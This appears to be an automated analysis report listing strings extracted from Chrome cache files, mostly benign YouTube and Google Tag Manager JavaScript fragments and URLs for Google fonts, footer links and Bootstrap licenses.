    Source: chromecache_720.1.drString found in binary or memory: bd.TABSET_PANELCONTAINER="glue-tabs__panelgroup";bd.TABSET_PAGE="glue-tabs__panel";var cd,dd=cd||(cd={});dd.PANELS_KEY="data-glue-expansion-panels-key";dd.TOGGLEFOR="data-glue-expansion-panel-toggle-for";dd.INITIAL="data-glue-expansion-panel-initial";var ed,fd=ed||(ed={});fd.MISSING_PAGE_LIST="No element with glue-tabpanels__page-list class was found. TabPanels requires a Panels Page List";fd.MISSING_PANEL_LIST="No element with glue-tabpanels__panel-list class was found. TabPanels requires a Panel List";var gd;(gd||(gd={})).IFRAME_SCRIPT_URL="https://www.youtube.com/iframe_api";var hd,id=hd||(hd={});id.YT_IFRAME_READY_EVENT="onYouTubeIframeAPIReady";id.API_INITIALIZED="glue.ui.ytVideo.IframeApiInitalized";id.IS_VISIBLE="glue.isVisible";id.IS_HIDDEN="glue.isHidden";var jd,kd=jd||(jd={});kd.VIDEO_ID="glueYtVideoId";kd.PLAYER_ID="glueYtPlayerId";kd.HEIGHT="glueYtVideoHeight";kd.WIDTH="glueYtVideoWidth";kd.PLAYER_VARS="glueYtVideoPlayerVars";function ld(){this.apiInitialized=this.isApiReady();this.videoObjects=new Map;this.init()}ld.getManager=function(){ld.instance||(ld.instance=new ld);return ld.instance};ld.destroyManager=function(){ld.instance=void 0}; equals www.youtube.com (Youtube)
    Source: chromecache_543.1.drString found in binary or memory: function bz(a){if(dj())2==Pi().rs?window.YT&&window.YT.Player?ez(a,a.i):(dr.push(function(f){ez(this,f)}.bind(a,a.i)),fr()):kj("//www.youtube.com/embed/"+a.o+"/?rel=0&cc_load_policy=1&autoplay=1&hl="+window.sc_pageModel.lang); equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.Ea("Goog_AdSense_Lidar_getUrlSignalsList",Q8a);var Ona=(new Date).getTime();var R8a="client_dev_domain client_dev_regex_map client_dev_root_url client_rollout_override expflag forcedCapability jsfeat jsmode mods".split(" ");[].concat(g.u(R8a),["client_dev_set_cookie"]);var Vka="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),Wka=/\bocr\b/;var Yka=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;"undefined"!==typeof TextDecoder&&new TextDecoder;var S8a="undefined"!==typeof TextEncoder?new TextEncoder:null,Upa=S8a?function(a){return S8a.encode(a)}:function(a){a=g.Gf(a); equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.JI=function(a){var b=g.wI(a);Axa.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.JS.prototype.u=function(a){var b=this;dMa(this);var c=a.FK,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.V?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.ke(MS(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Fo(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.V?this.ke(g.KS(a.errorMessage)):this.ke(MS(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.k.createUnpluggedLocationInfo=function(a){var b={};a=a.coords;if(null==a?0:a.latitude)b.latitudeE7=Math.floor(1E7*a.latitude);if(null==a?0:a.longitude)b.longitudeE7=Math.floor(1E7*a.longitude);if(null==a?0:a.accuracy)b.locationRadiusMeters=Math.round(a.accuracy);return b};var iN;g.v(hN,zx);hN.prototype.mB=function(a,b){a=zx.prototype.mB.call(this,a,b);return Object.assign({},a,this.Ov)};var nEa=/[&\?]action_proxy=1/,mEa=/[&\?]token=([\w-]*)/,oEa=/[&\?]video_id=([\w-]*)/,pEa=/[&\?]index=([\d-]*)/,qEa=/[&\?]m_pos_ms=([\d-]*)/,tEa=/[&\?]vvt=([\w-]*)/,hEa="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),rEa="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),jEa={android:"ANDROID", equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e,f,h){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.wI(this);e="www.youtube.com"===c;f=f&&this.K("embeds_enable_shorts_links_for_eligible_shorts");h&&this.K("fill_live_watch_url_in_watch_endpoint")&&e?h="https://"+c+"/live/"+a:!f&&d&&e?h="https://youtu.be/"+a:g.jI(this)?(h="https://"+c+"/fire",b.v=a):(f&&e?(h=this.protocol+"://"+c+"/shorts/"+a,d&&(b.feature="share")):(h=this.protocol+"://"+c+"/watch",b.v=a),Hy&&(a=Dna())&&(b.ebc=a));return g.ti(h,b)}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: g.vI=function(a){a=nI(a.Ja);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: gwa=function(a,b){if(!a.j["0"]){var c=new LF("0","fakesb",{video:new HF(0,0,0,void 0,void 0,"auto")});a.j["0"]=b?new mF(new g.GD("http://www.youtube.com/videoplayback"),c,"fake"):new EF(new g.GD("http://www.youtube.com/videoplayback"),c,new WE(0,0),new WE(0,0))}}; equals www.youtube.com (Youtube)
    Source: chromecache_719.1.drString found in binary or memory: l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Ff:d,Df:e,Ef:f,lg:g,mg:h,gd:l,Wa:b},p=z.YT,q=function(){Qy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var u=I.getElementsByTagName("script"),t=u.length,v=0;v<t;v++){var w=u[v].getAttribute("src");if(Ty(w,"iframe_api")||Ty(w,"player_api"))return b}for(var y=I.getElementsByTagName("iframe"),x=y.length,A=0;A<x;A++)if(!Ky&&Ry(y[A],n.gd))return mc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
    Source: chromecache_720.1.drString found in binary or memory: ld.prototype.init=function(){var a=this,c=new Event("Event");c.initEvent(hd.API_INITIALIZED,!0,!1);this.apiInitialized?document.dispatchEvent(c):this.apiInitPromise=new Promise(function(e){window.onYouTubeIframeAPIReady=function(){a.apiInitialized=!0;document.dispatchEvent(c);e()}});if(!window.YT){var d=document.createElement("script");document.body.appendChild(d);d.src="https://www.youtube.com/iframe_api"}};ld.prototype.isApiReady=function(){return"object"===typeof window.YT&&"function"===typeof window.YT.Player}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: this.protocol+"://www.youtube.com/";f=b?b.eventLabel:a.el;d="detailpage";"adunit"===f?d=this.C?"embedded":"detailpage":"embedded"===f||this.I?d=ox(d,f,rxa):f&&(d="embedded");this.Fa=d;cA();f=null;d=b?b.playerStyle:a.ps;e=g.nb(sxa,d);!d||e&&!this.I||(f=d);this.playerStyle=f;this.oa=(this.V=g.nb(sxa,this.playerStyle))&&"play"!==this.playerStyle&&"jamboard"!==this.playerStyle;this.Qn=!this.oa;this.Xa=nx(!1,a.disableplaybackui);this.disablePaidContentOverlay=nx(!1,null==b?void 0:b.disablePaidContentOverlay); equals www.youtube.com (Youtube)
    Source: chromecache_543.1.drString found in binary or memory: var Yy;function Rha(){var a,b;return Va(function(c){if("function"===typeof(null==(a=window.YT)?void 0:a.Player))return c.return();Yy||(b=document.createElement("script"),fi(b,hh(Yg(Zg("//www.youtube.com/player_api")))),document.body.appendChild(b),Yy=new Promise(function(e){window.onYouTubeIframeAPIReady=e})); equals www.youtube.com (Youtube)
    Source: chromecache_719.1.drString found in binary or memory: var ay=function(a,b,c,d,e){var f=zv("fsl",c?"nv.mwt":"mwt",0),g;g=c?zv("fsl","nv.ids",[]):zv("fsl","ids",[]);if(!g.length)return!0;var h=vv(a,"gtm.formSubmit",g),l=a.action;l&&l.tagName&&(l=a.cloneNode(!1).action);Q(121);"https://www.facebook.com/tr/"===l&&Q(122);if(U(79)&&"https://www.facebook.com/tr/"===l)return!0;h["gtm.elementUrl"]=l;null!=a.getAttribute("name")&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&& equals www.facebook.com (Facebook)
    Source: chromecache_626.1.drString found in binary or memory: var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/59acb1f3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"}; equals www.youtube.com (Youtube)
    Source: chromecache_543.1.drString found in binary or memory: w(Ly,E);function My(){this.part="snippet,id,contentDetails,localizations,statistics";this.Jj=new zm({Bg:"https://www.googleapis.com/youtube/v3",serviceName:"youtubeDataApi"})} equals www.youtube.com (Youtube)
    Source: chromecache_543.1.drString found in binary or memory: window.sc_initOverlay=function(){return new ar};var gfa=hh(Yg(Zg("//www.youtube.com/player_api"))),dr=[],er=!1;function fr(){if(!er){window.onYouTubeIframeAPIReady=hfa;var a=dk("SCRIPT");fi(a,gfa);document.head.appendChild(a);er=!0}} equals www.youtube.com (Youtube)
    Source: chromecache_444.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
    Source: chromecache_493.1.drString found in binary or memory: http://tools.ietf.org/html/rfc1950
    Source: chromecache_543.1.drString found in binary or memory: http://www.google.com/support/websearch/bin/answer.py?hl=
    Source: chromecache_493.1.drString found in binary or memory: http://www.youtube.com/videoplayback
    Source: chromecache_493.1.drString found in binary or memory: http://youtube.com/drm/2012/10/10
    Source: chromecache_493.1.drString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
    Source: chromecache_493.1.drString found in binary or memory: http://youtube.com/streaming/otf/durations/112015
    Source: chromecache_493.1.drString found in binary or memory: http://youtube.com/yt/2012/10/10
    Source: chromecache_449.1.drString found in binary or memory: https://abc.xyz/investor/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://about.google/
    Source: chromecache_493.1.drString found in binary or memory: https://admin.youtube.com
    Source: chromecache_449.1.drString found in binary or memory: https://ads.google.com/home/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/hammerjs/2.0.8/hammer.min.js
    Source: chromecache_599.1.dr, chromecache_448.1.dr, chromecache_467.1.dr, chromecache_642.1.drString found in binary or memory: https://apis.google.com/js/api.js
    Source: chromecache_588.1.drString found in binary or memory: https://apis.google.com/js/client.js
    Source: chromecache_449.1.drString found in binary or memory: https://blog.google
    Source: chromecache_449.1.drString found in binary or memory: https://careers.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_440.1.dr, chromecache_719.1.drString found in binary or memory: https://cct.google/taggy/agent.js
    Source: chromecache_588.1.drString found in binary or memory: https://clients6.google.com
    Source: chromecache_449.1.drString found in binary or memory: https://cloud.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_588.1.drString found in binary or memory: https://content-googleapis-staging.sandbox.google.com
    Source: chromecache_588.1.drString found in binary or memory: https://content-googleapis-test.sandbox.google.com
    Source: chromecache_449.1.drString found in binary or memory: https://crisisresponse.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://crisisresponse.google/?utm_source=about.google&amp;utm_medium=referral&amp;utm_campaign=site
    Source: chromecache_543.1.drString found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
    Source: chromecache_449.1.drString found in binary or memory: https://diversity.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_493.1.drString found in binary or memory: https://docs.google.com/get_video_info
    Source: chromecache_449.1.drString found in binary or memory: https://edu.google.com/
    Source: chromecache_449.1.drString found in binary or memory: https://edu.google.com?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_588.1.drString found in binary or memory: https://feedback2-test.corp.google.com/inapp/%
    Source: chromecache_588.1.drString found in binary or memory: https://feedback2-test.corp.google.com/tools/feedback/%
    Source: chromecache_588.1.drString found in binary or memory: https://feedback2-test.corp.googleusercontent.com/inapp/%
    Source: chromecache_588.1.drString found in binary or memory: https://feedback2-test.corp.googleusercontent.com/tools/feedback/%
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.google.com/license/googlerestricted
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RP
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv39oS_a.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDvD9oS_a.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDvH9oS_a.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDvr9oS_a.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUo9-KzpRiLCAt4Unrc-xIKmCU5qE9Gh09GixI.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUo9-KzpRiLCAt4Unrc-xIKmCU5qE9Ghk9GixI.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUo9-KzpRiLCAt4Unrc-xIKmCU5qE9GiU9G.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUo9-KzpRiLCAt4Unrc-xIKmCU5qE9Gik9GixI.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUo9-KzpRiLCAt4Unrc-xIKmCU5qE9GjU9GixI.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmZjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmdjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmtjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmxjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmZjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmdjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmhjtg.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmtjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmxjtiu7.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OMmpTsDO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OMmpTtDO_.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OMmpTtzO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OMmpTujO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OMmpTuzO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OemxTsDO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OemxTtDO_.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OemxTtzO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OemxTujO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUr9-KzpRiLCAt4Unrc-xIKmCU5qE9OemxTuzO_PZ0.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qER2i1dC.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2)
    Source: chromecache_549.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/lens_camera/v1/192px.svg
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVE9eOcEg.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVFNeOcEg.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVGdeOcEg.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxEIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxFIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxGIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxHIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxIIzI.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxLIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxMIzIFKw.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
    Source: chromecache_512.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
    Source: chromecache_484.1.dr, chromecache_499.1.drString found in binary or memory: https://getbootstrap.com)
    Source: chromecache_486.1.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_720.1.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
    Source: chromecache_493.1.drString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
    Source: chromecache_484.1.dr, chromecache_499.1.dr, chromecache_486.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
    Source: chromecache_484.1.dr, chromecache_486.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
    Source: chromecache_440.1.dr, chromecache_719.1.drString found in binary or memory: https://googleads.g.doubleclick.net
    Source: chromecache_449.1.drString found in binary or memory: https://grow.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_588.1.drString found in binary or memory: https://gstatic.com/uservoice/surveys/resources/
    Source: chromecache_588.1.drString found in binary or memory: https://gstatic.com/uservoice/surveys/resources/%
    Source: chromecache_493.1.drString found in binary or memory: https://i.ytimg.com/vi/
    Source: chromecache_449.1.drString found in binary or memory: https://instagram.com/google/
    Source: chromecache_493.1.drString found in binary or memory: https://jnn-pa.googleapis.com
    Source: chromecache_449.1.drString found in binary or memory: https://learning.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://learning.google/?utm_source=about.google&amp;utm_medium=referral&amp;utm_campaign=site-switc
    Source: chromecache_549.1.drString found in binary or memory: https://lens.google/?hl=
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/-tJ0exa-sFRDGwxCfFtT3kaKnhcmHAvtjqHDP41VZhmjMHrNxR7jTkuXxHlonYHF-0
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/4OMr0tkN-puVthzh9N6e028DIaYljPtm3HD-WZXJ7i1PijG206V92KtvEIUytIinK9
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/4vIWhSoCMzWHL20aDe5EGrv5EypSOWfQjoeBfA9Z32YCinijg5J0S1Sn6FN2uTgbm_
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsO
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/EICyRNLJhOmFUAfdDXw9x4mQAeefUSSZyYNNVxLzCO6q7VfCIMG9faB3-q8aSqz6xt
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/LOrhe71Tt-bTc3xdZDG8fwvwhs8qF0ygHRj9DjbcQpP6WWkHFwd8Kca9FbMjZ_y8GV
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/SlyChETIQJ7vYqlxu4X_R1i2HoXIqYtGBMTDWDmuJwFZBVvypnUvt8KvcWfQvOZW-G
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/XH1nTzt31w0D2Mh0RIwO57SRWR9xEGnCj9PIt7H6OIWfZJNhuCQTrBJWbzzcr5x1Nr
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/jcu0uhAhK_fAiuPSrVmgIQxcwSxkTkHtGP4XRFhnh497_XGtN_KEA_0eCFdxXHxkMf
